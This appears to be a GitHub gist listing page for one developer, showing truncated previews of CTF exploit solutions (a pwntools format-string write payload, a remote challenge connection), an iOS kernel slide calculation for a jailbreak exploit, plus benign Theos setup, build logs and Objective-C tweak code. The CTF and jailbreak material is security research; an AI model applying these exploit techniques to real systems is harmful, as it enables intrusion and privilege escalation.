George ninjaprawn
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import remote | |
| from pwn import p64, p32 | |
| DEVICE_ID = '' | |
| conn = remote('c.sk8.dog', 30001) | |
| conn.send(f'CONNECT challenge.{DEVICE_ID}:1337 HTTP/1.1\n\n'.encode()) | |
| [conn.recvline() for _ in range(3)] # consume HTTP response status line / headers | |
| win_line = conn.recvline() | |
| win_addr = win_line.split(b"number ")[1].split(b"!")[0] |
ninjaprawn
/ exp_neo_boffy.py
Created
July 17, 2018 03:39
Solution to Neo Boffy from the BSides Canberra CTF 2018
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| bin_path = "./neo_boffy" | |
| # Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries | |
| context(log_level="ERROR") | |
| # Can't send NULLs, but can send empty strings | |
| def cmdify(str): return str.split("\x00") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Added: | |
| - /System/Library/AccessibilityBundles/AXActionSheetUIServer.axuiservice/AXActionSheetUIServer | |
| - /System/Library/Frameworks/AuthenticationServices.framework/AuthenticationServices | |
| - /System/Library/Frameworks/CarPlay.framework/CarPlay | |
| - /System/Library/Frameworks/CoreServices.framework/CoreServices | |
| - /System/Library/Frameworks/CoreTelephony.framework/Support/libSystemDetermination.dylib | |
| - /System/Library/Frameworks/GLKit.framework/GLKit | |
| - /System/Library/Frameworks/IdentityLookupUI.framework/IdentityLookupUI | |
| - /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSRayIntersector.framework/MPSRayIntersector | |
| - /System/Library/Frameworks/NaturalLanguage.framework/NaturalLanguage |
ninjaprawn
/ exp_fat_morphine.py
Created
May 31, 2018 06:13
Solution to Fat Morphine from the BSides Canberra CTF 2018
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| bin_path = "./fat_morphine" | |
| payload = "" | |
| payload += "%4196134x" # What we are writing | |
| payload += "%{}$lln" # How we write it | |
| payload += "\x30\x0d\x60" # Where we write it | |
| payload = payload.format(10) |
ninjaprawn
/ slide.c
Last active
December 12, 2017 12:49
async_wake_ios slide calculator - based of Siguza's v0rtex method of calculating the slide
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Offsets from iOS 11.1.2 iPhone 6+ | |
| Insert the following after line 680 in async_wait.c | |
| Mostly from Siguza's v0rtex | |
| */ | |
| mach_ports_register(mach_task_self(), &user_client, 1); | |
| uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list | |
| uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); | |
| uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr); |
ninjaprawn
/ installing theos
Created
February 12, 2017 08:00
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| brew install dpkg ldid | |
| cd ~ | |
| git clone --recursive https://github.com/theos/theos.git | |
| echo "export THEOS=~/theos" >> .bash_profile |
ninjaprawn
/ limitless301016.log
Created
November 30, 2016 08:10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Showing All Messages | |
| Build target Limitless of project Limitless with configuration Debug | |
| PhaseScriptExecution Symlinks\ Setup /Users/ninja/Library/Developer/Xcode/DerivedData/Limitless-ffaafdspyfyrqgberifhaiobmnbg/Build/Intermediates/Limitless.build/Debug-iphoneos/Limitless.build/Script-FA25322E1DE0FB2800D4FA86.sh | |
| cd /Volumes/Files/Developer/Limitless | |
| export ACTION=build | |
| export AD_HOC_CODE_SIGNING_ALLOWED=NO | |
| export ALTERNATE_GROUP=staff |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ... | |
| @property (strong, nonatomic) NSString *currentPhoneNumber; | |
| ... | |
| -(NSMutableArray*)getHiddenNumbers { | |
| NSArray *hiddenNumbers = [[NSUserDefaults standardUserDefaults] objectForKey:@"hiddenNumbers"]; | |
| if (hiddenNumbers == nil) { | |
| return [[NSMutableArray alloc] init]; | |
| } | |
| return [NSMutableArray arrayWithArray:hiddenNumbers]; |
ninjaprawn
/ privateclassaccessability
Created
December 24, 2015 04:55
List of private classes/functions that can be accessed magically
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SBUIController - NO (Protected by FrontBoard) | |
| SBIconController - NO (Protected by FrontBoard) | |
| SBPowerDownController - YES (assertion failure in -[SBPowerDownController _screen]) | |
| SBWallpaperController - NO (Protected by FrontBoard) | |
| SpringBoard (actual app) - YES (Not sure how to fetch, Only one UIApp can be active at one time) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %hook BSPlatform | |
| - (BOOL)isInternalInstall { | |
| return YES; | |
| } | |
| %end | |
NewerOlder